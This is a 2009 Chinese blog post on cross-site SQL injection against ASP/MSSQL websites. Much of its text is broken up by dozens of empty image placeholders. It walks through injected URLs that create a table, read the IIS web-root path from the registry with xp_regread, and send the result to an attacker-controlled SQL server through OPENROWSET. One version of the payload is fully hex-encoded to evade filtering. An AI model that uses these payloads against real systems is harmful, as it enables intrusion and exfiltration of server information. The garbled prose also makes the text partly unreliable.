跨站脚本注入:跨站式SQL注入来源: 发布时间:星期六, 2009年9月12日 浏览:19次 评论:0
BY 老凯(laokai) QQ 35054779
在屏蔽了 ![]() ![]() ![]() ![]() 前 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 思路如下 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 既然是研究阶段 ![]() ![]() ![]() ![]() 第 ![]() SQL可以连接外部 ![]() ![]() ![]() 于是 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 尝试 sp_addlinkedserver 如果成功 ![]() ![]() ![]() ![]() 提示必须是sysadmin ![]() ![]() ![]() ![]() ![]() 换 ![]() 只要你SQL敢发命令过来 ![]() ![]() ![]() ![]() ![]() 于是考虑到 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 第 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert ![]() ![]() 这段代码什么意思哪?就是把网站WebSite ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() SELECT a.* FROM OPENROWSET('SQLOLEDB','你 ![]() 其中 ![]() ![]() ![]() DECLARE @a1 char(255) ![]() 这样就等于执行了 SELECT a.* FROM OPENROWSET('SQLOLEDB','你 ![]() 这 ![]() ![]() ![]() ![]() SELECT * FROM pubs.dbo.authors where au_fname='C:\Inetpub,,1' 其中 ![]() ![]() ![]() ![]() ![]() ![]() 现在进入实战阶段 ![]() ![]() ![]() ![]() a.asp?id=1;create table [dbo].[laokai]([cha8][char](255))-- 返回正常,我们建立了 ![]() ![]() ![]() a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert ![]() ![]() 出错了 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 于是写了 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%4F%4E%54%52%4F%4C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%20%2C%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29%20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27%53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75%5F%66%6E%61%6D%65%3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20%2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20 执行成功 ![]() ![]() ![]() a.asp?id=1;DECLARE @a1 char(255) ![]() 网站WebSite那边显示还是正常页面 ![]() ![]() ![]() 注入成功 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 最后介绍说明 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' 部分 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 0
相关文章读者评论发表评论 |